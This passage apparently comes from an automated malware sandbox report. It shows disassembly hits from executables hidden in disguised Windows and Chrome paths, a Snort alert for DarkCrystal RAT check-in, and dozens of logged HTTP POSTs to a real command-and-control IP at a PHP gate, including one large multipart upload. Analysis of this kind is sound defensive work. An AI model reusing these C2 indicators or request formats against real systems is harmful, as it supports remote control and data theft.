                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeCode function: 4x nop then jmp 00007FF848F126F6h32_2_00007FF848F01CA5
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeCode function: 4x nop then jmp 00007FF848F226F6h33_2_00007FF848F224EE
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeCode function: 4x nop then jmp 00007FF848F226F6h34_2_00007FF848F224EE
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeCode function: 4x nop then jmp 00007FF848F426F6h35_2_00007FF848F424EE
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeCode function: 4x nop then jmp 00007FF848F226F6h36_2_00007FF848F224EE
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeCode function: 4x nop then jmp 00007FF848F426F6h38_2_00007FF848F424EE
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeCode function: 4x nop then jmp 00007FF848F326F6h39_2_00007FF848F324EE
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh39_2_00007FF8490D896D

                    Networking

                    barindex
                    Snort IDS alert for network traffic
                    Source: TrafficSnort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.5:49711 -> 185.87.199.107:80
                    Source: Joe Sandbox ViewASN Name: IHCRUInternet-HostingLtdMoscowRussiaRU IHCRUInternet-HostingLtdMoscowRussiaRU
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 384Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1332Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CxrqPI7Urq2ZAKju3VdYIE8dairlKhIZrDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 135114Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1060Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1332Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1060Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1312Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1312Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1312Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1332Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1332Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1060Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1332Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1312Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1332Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1060Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1332Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
